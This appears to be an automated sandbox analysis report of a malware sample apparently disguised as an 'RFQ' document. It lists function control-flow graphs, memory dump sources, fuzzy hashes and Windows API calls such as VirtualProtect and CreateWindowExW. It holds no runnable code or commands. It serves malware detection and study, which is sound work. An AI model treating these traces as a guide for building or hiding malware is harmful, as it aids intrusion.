                                                                                                              control_flow_graph 836 7310b90-7310bb3 837 7310bb5 836->837 838 7310bba-7310c14 836->838 837->838 841 7310c17 838->841 842 7310c1e-7310c3a 841->842 843 7310c43-7310c44 842->843 844 7310c3c 842->844 845 7310df0-7310e60 843->845 853 7310c49-7310c71 843->853 844->841 844->845 846 7310d93-7310dae 844->846 847 7310c73-7310c85 844->847 848 7310db3-7310dca 844->848 849 7310cdc-7310d06 844->849 850 7310d60-7310d6d 844->850 851 7310c87-7310ca7 844->851 852 7310d46-7310d5b 844->852 844->853 854 7310d0b-7310d41 844->854 855 7310cac-7310cb0 844->855 856 7310dcf-7310deb 844->856 872 7310e62 call 7312b37 845->872 873 7310e62 call 7312766 845->873 874 7310e62 call 7312ae8 845->874 875 7310e62 call 7311e88 845->875 876 7310e62 call 731214b 845->876 877 7310e62 call 7311e7a 845->877 846->842 847->842 848->842 849->842 868 7310d76-7310d8e 850->868 851->842 852->842 853->842 854->842 857 7310cc3-7310cca 855->857 858 7310cb2-7310cc1 855->858 856->842 859 7310cd1-7310cd7 857->859 858->859 859->842 868->842 871 7310e68-7310e72 872->871 873->871 874->871 875->871 876->871 877->871
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Te^q$Te^q$z^I
                                                                                                              • API String ID: 0-2886491258
                                                                                                              • Opcode ID: 367a78f78a84a46fa0bea6c507d3e1de4e97244342fe57e5f12b95a6564c3b0e
                                                                                                              • Instruction ID: 8a8383de4158b055a1802cfeb563f86d90a9612131d163f47323bdfe9d877a48
                                                                                                              • Opcode Fuzzy Hash: 367a78f78a84a46fa0bea6c507d3e1de4e97244342fe57e5f12b95a6564c3b0e
                                                                                                              • Instruction Fuzzy Hash: EE91C3B4E102198FDB08CFAAC5849DEFBB6FF89300F24942AD419BB254D7349945CF54
                                                                                                              Function 073196C8 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 901 73196c8-73196ed 902 73196f4-7319725 901->902 903 73196ef 901->903 904 7319726 902->904 903->902 905 731972d-7319749 904->905 906 7319752-7319753 905->906 907 731974b 905->907 908 7319758-731979a 906->908 909 73199bf-73199c8 906->909 907->904 907->908 907->909 910 73198d3-73198fa 907->910 911 7319893-73198a6 907->911 912 7319972-7319984 907->912 913 73197b4-73197db 907->913 914 73197f7-73197fd call 7319b08 907->914 915 731995b-731996d 907->915 916 731985c-7319860 907->916 917 731979c-73197af 907->917 918 73198ff-7319912 907->918 919 731993e-7319956 907->919 920 73197e0-73197f2 907->920 921 73198c5-73198ce 907->921 922 73199a5-73199ba 907->922 923 7319844-7319857 907->923 924 7319989-73199a0 907->924 925 7319828-731983f 907->925 926 73198ab-73198c0 907->926 908->905 910->905 911->905 912->905 913->905 935 7319803-7319823 914->935 915->905 927 7319873-731987a 916->927 928 7319862-7319871 916->928 917->905 929 7319925-731992c 918->929 930 7319914-7319923 918->930 919->905 920->905 921->905 922->905 923->905 924->905 925->905 926->905 934 7319881-731988e 927->934 928->934 931 7319933-7319939 929->931 930->931 931->905 934->905 935->905
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TuA$UC;"
                                                                                                              • API String ID: 0-2071649361
                                                                                                              • Opcode ID: dc932b70d9e53f60049d88be999bf43d35e13c7c21930a9fe110fc77ab96d502
                                                                                                              • Instruction ID: f331583d91ca21783a2aa0cef4a0e87ea138f41d3e1627a6ac70883dc355024f
                                                                                                              • Opcode Fuzzy Hash: dc932b70d9e53f60049d88be999bf43d35e13c7c21930a9fe110fc77ab96d502
                                                                                                              • Instruction Fuzzy Hash: 06913BB4D24209DFDB08CFE6E59059EFBB6FF89350F10A42AE519AB264D734A541CF40
                                                                                                              Function 073196B8 Relevance: 2.7, Strings: 2, Instructions: 223COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 939 73196b8-73196ed 941 73196f4-7319725 939->941 942 73196ef 939->942 943 7319726 941->943 942->941 944 731972d-7319749 943->944 945 7319752-7319753 944->945 946 731974b 944->946 947 7319758-731979a 945->947 948 73199bf-73199c8 945->948 946->943 946->947 946->948 949 73198d3-73198fa 946->949 950 7319893-73198a6 946->950 951 7319972-7319984 946->951 952 73197b4-73197db 946->952 953 73197f7-73197fd call 7319b08 946->953 954 731995b-731996d 946->954 955 731985c-7319860 946->955 956 731979c-73197af 946->956 957 73198ff-7319912 946->957 958 731993e-7319956 946->958 959 73197e0-73197f2 946->959 960 73198c5-73198ce 946->960 961 73199a5-73199ba 946->961 962 7319844-7319857 946->962 963 7319989-73199a0 946->963 964 7319828-731983f 946->964 965 73198ab-73198c0 946->965 947->944 949->944 950->944 951->944 952->944 974 7319803-7319823 953->974 954->944 966 7319873-731987a 955->966 967 7319862-7319871 955->967 956->944 968 7319925-731992c 957->968 969 7319914-7319923 957->969 958->944 959->944 960->944 961->944 962->944 963->944 964->944 965->944 973 7319881-731988e 966->973 967->973 970 7319933-7319939 968->970 969->970 970->944 973->944 974->944
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TuA$UC;"
                                                                                                              • API String ID: 0-2071649361
                                                                                                              • Opcode ID: 77ef4fde19d695a286506587c4275a1c50715f698dacc75b5117042f7da27c1b
                                                                                                              • Instruction ID: ce1b09c6a643b1f15396b20e831eb409dc77735c23b44e10ce13ba730a16a650
                                                                                                              • Opcode Fuzzy Hash: 77ef4fde19d695a286506587c4275a1c50715f698dacc75b5117042f7da27c1b
                                                                                                              • Instruction Fuzzy Hash: AF913BB4D24209DFDB08CFA6E59069EFBB6FF89350F10D42AE519AB264D734A941CF40
                                                                                                              Function 07318090 Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 5=6
                                                                                                              • API String ID: 0-2897083178
                                                                                                              • Opcode ID: c9754a2750d2cb1278d313784ac59d3c6eeef91704fe29fb6a329c19b5ec5add
                                                                                                              • Instruction ID: 9fcf9491ea0b20f67fe5419044d08c36fd61456faabf42d0058873eeb1b7bcb4
                                                                                                              • Opcode Fuzzy Hash: c9754a2750d2cb1278d313784ac59d3c6eeef91704fe29fb6a329c19b5ec5add
                                                                                                              • Instruction Fuzzy Hash: 227139B5E1520AAFCB08CFA5D9444AEFBF6FF8A210F10D46AD016E7354DB389A018F55
                                                                                                              Function 073180A0 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 5=6
                                                                                                              • API String ID: 0-2897083178
                                                                                                              • Opcode ID: ebaf7a04ecd67bb9e9e60ba5eb465ff35f12fddfbd7ede115ed7fa28c99f66b8
                                                                                                              • Instruction ID: cc7e9783a01f89534dd4a207bc85a75b03e913cf4dc7cc26e475ac04b20a1171
                                                                                                              • Opcode Fuzzy Hash: ebaf7a04ecd67bb9e9e60ba5eb465ff35f12fddfbd7ede115ed7fa28c99f66b8
                                                                                                              • Instruction Fuzzy Hash: 466139B4E1520AAFCB08CFA5D9444AEFBF6FF8A210F10D46AD01AE7254D7389A018F55
                                                                                                              Function 04D46DC0 Relevance: .8, Instructions: 839COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2080722045.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4d40000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9d71efd09ae3662dfa98790637811a2043d6036d0d8794ecb6a54bd480297b1
                                                                                                              • Instruction ID: 4c0f157cb9a19c5d0944203218088dc36e55c71f58210e698003e54c531b5ada
                                                                                                              • Opcode Fuzzy Hash: f9d71efd09ae3662dfa98790637811a2043d6036d0d8794ecb6a54bd480297b1
                                                                                                              • Instruction Fuzzy Hash: 9C92C234A00659CFDB54DB68C894BD9B7B2FF8A304F1186EAD4096B360DB35AE85CF50
                                                                                                              Function 04D46DB3 Relevance: .8, Instructions: 836COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2080722045.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4d40000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f89d747273cdef794fb29d25db88aef82ff71335403071bda1e7c0436abb2464
                                                                                                              • Instruction ID: ecb3982989e5ae3f753300483b2d8748666e551f540bbdc873cd23c8a1184076
                                                                                                              • Opcode Fuzzy Hash: f89d747273cdef794fb29d25db88aef82ff71335403071bda1e7c0436abb2464
                                                                                                              • Instruction Fuzzy Hash: F892C234A00659CFDB54DB68C894BD9B7B2FF8A304F1186EAD4096B360DB35AE85CF50
                                                                                                              Function 04D49071 Relevance: .2, Instructions: 195COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2080722045.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4d40000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d99048e44d154cf48c2f5a2f37fb4d34a29c04d4a0f13fca1518c68b893ce54c
                                                                                                              • Instruction ID: 32636d2ec65980bb21d1e89f2ab6dac18252d09e3da99a483294c4f7716e06c7
                                                                                                              • Opcode Fuzzy Hash: d99048e44d154cf48c2f5a2f37fb4d34a29c04d4a0f13fca1518c68b893ce54c
                                                                                                              • Instruction Fuzzy Hash: EA5128B1B00955CFFF127E3E882029EE6D2FBD5658F000675E512EA398EA75ED80C355
                                                                                                              Function 07311E88 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1ef508f5e5fc9903726549484ce86ab079a98f750e5a76a7bc7e8a43ac17acdd
                                                                                                              • Instruction ID: c9b7ef6f50364df99cacb389837f63b0c961c94afe60aa3bdbcc96620c71ffef
                                                                                                              • Opcode Fuzzy Hash: 1ef508f5e5fc9903726549484ce86ab079a98f750e5a76a7bc7e8a43ac17acdd
                                                                                                              • Instruction Fuzzy Hash: 8121F7B1E016188BDB18CFABD9446DEBBB7AFC8310F14C06AD509A6268DB355A45CF50
                                                                                                              Function 07311E7A Relevance: .1, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 92b81e7937287b9506b3c31fc2d0f4205611476f269d9753d5b720c7ba617947
                                                                                                              • Instruction ID: 0acd7cab7dd86ac8925f4bcf8371335d7197eb76c4e5c1cc9f06cf59844040c1
                                                                                                              • Opcode Fuzzy Hash: 92b81e7937287b9506b3c31fc2d0f4205611476f269d9753d5b720c7ba617947
                                                                                                              • Instruction Fuzzy Hash: DC21E8B1E006188BEB18CFABC9447CEBBF7AFC8300F14C06AD508A6258DB345A46CF50
                                                                                                              Function 025BAE48 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1021 25bae48-25bae57 1022 25bae59-25bae66 call 25ba1a0 1021->1022 1023 25bae83-25bae87 1021->1023 1029 25bae68 1022->1029 1030 25bae7c 1022->1030 1025 25bae9b-25baedc 1023->1025 1026 25bae89-25bae93 1023->1026 1032 25baee9-25baef7 1025->1032 1033 25baede-25baee6 1025->1033 1026->1025 1077 25bae6e call 25bb0df 1029->1077 1078 25bae6e call 25bb0e0 1029->1078 1030->1023 1034 25baf1b-25baf1d 1032->1034 1035 25baef9-25baefe 1032->1035 1033->1032 1040 25baf20-25baf27 1034->1040 1037 25baf09 1035->1037 1038 25baf00-25baf07 call 25ba1ac 1035->1038 1036 25bae74-25bae76 1036->1030 1039 25bafb8-25bb078 1036->1039 1042 25baf0b-25baf19 1037->1042 1038->1042 1072 25bb07a-25bb07d 1039->1072 1073 25bb080-25bb0ab GetModuleHandleW 1039->1073 1043 25baf29-25baf31 1040->1043 1044 25baf34-25baf3b 1040->1044 1042->1040 1043->1044 1045 25baf48-25baf51 call 25ba1bc 1044->1045 1046 25baf3d-25baf45 1044->1046 1052 25baf5e-25baf63 1045->1052 1053 25baf53-25baf5b 1045->1053 1046->1045 1054 25baf81-25baf8e 1052->1054 1055 25baf65-25baf6c 1052->1055 1053->1052 1062 25bafb1-25bafb7 1054->1062 1063 25baf90-25bafae 1054->1063 1055->1054 1057 25baf6e-25baf7e call 25ba1cc call 25ba1dc 1055->1057 1057->1054 1063->1062 1072->1073 1074 25bb0ad-25bb0b3 1073->1074 1075 25bb0b4-25bb0c8 1073->1075 1074->1075 1077->1036 1078->1036
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 025BB09E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2077104771.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_25b0000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 733236eb7af1021734c470dd3fed5ebaefa331817ca803074ca09fd2fd4336e6
                                                                                                              • Instruction ID: 7d6381382075416f00cd47c71dff38d32e992bbbfd40fc7564d12a6d66cef36b
                                                                                                              • Opcode Fuzzy Hash: 733236eb7af1021734c470dd3fed5ebaefa331817ca803074ca09fd2fd4336e6
                                                                                                              • Instruction Fuzzy Hash: 5C7134B1A00B058FD725DF29D4447AABBF6FF88304F008A2DE48AD7A50D775E945CB94
                                                                                                              Function 04D418E4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1079 4d418e4-4d41956 1081 4d41961-4d41968 1079->1081 1082 4d41958-4d4195e 1079->1082 1083 4d41973-4d41a12 CreateWindowExW 1081->1083 1084 4d4196a-4d41970 1081->1084 1082->1081 1086 4d41a14-4d41a1a 1083->1086 1087 4d41a1b-4d41a53 1083->1087 1084->1083 1086->1087 1091 4d41a55-4d41a58 1087->1091 1092 4d41a60 1087->1092 1091->1092 1093 4d41a61 1092->1093 1093->1093
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D41A02
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2080722045.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4d40000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: e0e8be3e7b60b3dc8b1598fa30addaee06468605d7cee38f8275fd077275cd80
                                                                                                              • Instruction ID: 39650dc3511b268e8e2d92567f2b7236b5c8898e8fdbb72e2e0997dbe8f43be7
                                                                                                              • Opcode Fuzzy Hash: e0e8be3e7b60b3dc8b1598fa30addaee06468605d7cee38f8275fd077275cd80
                                                                                                              • Instruction Fuzzy Hash: D251D3B1D00319DFDB14CF99C984ADEBBB5FF88314F24822AE419AB250D771A985CF91
                                                                                                              Function 04D418F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1094 4d418f0-4d41956 1095 4d41961-4d41968 1094->1095 1096 4d41958-4d4195e 1094->1096 1097 4d41973-4d41a12 CreateWindowExW 1095->1097 1098 4d4196a-4d41970 1095->1098 1096->1095 1100 4d41a14-4d41a1a 1097->1100 1101 4d41a1b-4d41a53 1097->1101 1098->1097 1100->1101 1105 4d41a55-4d41a58 1101->1105 1106 4d41a60 1101->1106 1105->1106 1107 4d41a61 1106->1107 1107->1107
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D41A02
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2080722045.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4d40000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: e85f280a4de4f861825231ea4666337a3da1154dcd38ffe17a762f773799a622
                                                                                                              • Instruction ID: 07ec3ea28136a3094f69decc40f7d10f8905af5e3add5e73cd7054b9f6af896b
                                                                                                              • Opcode Fuzzy Hash: e85f280a4de4f861825231ea4666337a3da1154dcd38ffe17a762f773799a622
                                                                                                              • Instruction Fuzzy Hash: BB41C2B1D00309DFDB14CF99C984ADEBBB5FF88310F24822AE418AB250D771A985CF91
                                                                                                              Function 025B44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 025B59C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2077104771.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_25b0000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 7cd4cbe4373bd8da22e630259c8d23fb0a258d37d9c3eb6304e1f60628322322
                                                                                                              • Instruction ID: 8c565704b6c7604e1b96685039c1ad536f8977c2b1c2a0850d87b9627ec7b7c0
                                                                                                              • Opcode Fuzzy Hash: 7cd4cbe4373bd8da22e630259c8d23fb0a258d37d9c3eb6304e1f60628322322
                                                                                                              • Instruction Fuzzy Hash: 8741F2B0D00719CBDB25CFA9C8447CDBBB5BF49304F64806AD408BB255EB756989CF90
                                                                                                              Function 04D44050 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04D44111
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2080722045.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4d40000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallProcWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2714655100-0
                                                                                                              • Opcode ID: e750b0e2eb046aa536426999df4cf6a626274794d458318c2ce009aa02926d16
                                                                                                              • Instruction ID: 509357780114d0ba9900bc97821027146a996aed739c3d11d874f79809c1a25d
                                                                                                              • Opcode Fuzzy Hash: e750b0e2eb046aa536426999df4cf6a626274794d458318c2ce009aa02926d16
                                                                                                              • Instruction Fuzzy Hash: CF4138B8A00319DFDB14CF89C848BAABBF5FB88314F24C458D419AB321D374A841CFA0
                                                                                                              Function 025B5913 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 025B59C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2077104771.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_25b0000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: cc387f0a36bd26581d973dd73c350cc21119f058efb3be47cc0bf96a7ef5e6e4
                                                                                                              • Instruction ID: 3e0dcfeab8fa667b0416142655d328040be922322f365376605fa33c0d840d80
                                                                                                              • Opcode Fuzzy Hash: cc387f0a36bd26581d973dd73c350cc21119f058efb3be47cc0bf96a7ef5e6e4
                                                                                                              • Instruction Fuzzy Hash: D141FFB0D00619CBDB25DFA9C9847CDBBB5BF48304F64806AD408BB264DB75698ACF90
                                                                                                              Function 025BB830 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025BD6E6,?,?,?,?,?), ref: 025BD7A7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2077104771.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_25b0000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 4be465d4de865f5ba9b7f9f40df009b0f7d6cd258b13c0e50e648a175347863a
                                                                                                              • Instruction ID: 11664f749c5772f17086bf4421491adf232303ecbc74210083d7c7ea776f70cc
                                                                                                              • Opcode Fuzzy Hash: 4be465d4de865f5ba9b7f9f40df009b0f7d6cd258b13c0e50e648a175347863a
                                                                                                              • Instruction Fuzzy Hash: B021E3B5901248AFDB10CF9AD584ADEBFF8FB48320F14841AE958B7310D378A950CFA4
                                                                                                              Function 07317CB8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07317D33
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 42b814dfedba907d07a62b65f3357b048e4decc414982dfb70a171eeaee3ef8c
                                                                                                              • Instruction ID: e245b84374ab8ee691ae6ac8eebadffa9e5afeac7fe79a819a53a2e24cbbc30f
                                                                                                              • Opcode Fuzzy Hash: 42b814dfedba907d07a62b65f3357b048e4decc414982dfb70a171eeaee3ef8c
                                                                                                              • Instruction Fuzzy Hash: AC21F2B6900219DFCB10DF9AC584BDEFBF4BB48320F14842AE858A7250D378A645CFA1
                                                                                                              Function 07317CC0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07317D33
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: b8c0ba00cc2fc3982ee6ac7ce3f65364b336e8d6d48d6a67020ba88f9912a6b9
                                                                                                              • Instruction ID: bdd9042f5fb324102dc37439181874d5cae4737aa4df3c3bedff747f65208ab1
                                                                                                              • Opcode Fuzzy Hash: b8c0ba00cc2fc3982ee6ac7ce3f65364b336e8d6d48d6a67020ba88f9912a6b9
                                                                                                              • Instruction Fuzzy Hash: 0E2126B6900249DFCB10DF9AC484BDEFBF4FB48320F148429E858A7250D378A544CFA5
                                                                                                              Function 025BB038 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 025BB09E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2077104771.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_25b0000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 687a58c7dd2e3801b18519ec1360e7fb50160c20a8c5e67ff6e9b660a3af5e82
                                                                                                              • Instruction ID: c2b9adc5c86702ffe92a9384acb552bef5b63029ebcfbd5b7eb1252fbbc30364
                                                                                                              • Opcode Fuzzy Hash: 687a58c7dd2e3801b18519ec1360e7fb50160c20a8c5e67ff6e9b660a3af5e82
                                                                                                              • Instruction Fuzzy Hash: 081102B5D002498FCB20DF9AC444AEEFBF4BF88324F14841AD868A7210D375A545CFA5
                                                                                                              Function 00F3D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2076925273.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_f3d000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ef53c812816cb2145ffc78a3003dba315a556ee515d1682e11211ad4e00a7661
                                                                                                              • Instruction ID: 19aabfbd39324e077728a1739482deeb19e995ba52b7e1bb92d9f119cc1591d0
                                                                                                              • Opcode Fuzzy Hash: ef53c812816cb2145ffc78a3003dba315a556ee515d1682e11211ad4e00a7661
                                                                                                              • Instruction Fuzzy Hash: 6F212671904204EFDB05DF14E9C0B27BBA5FB84334F20C66DE8494B396C736D846DA61
                                                                                                              Function 00F3D01C Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
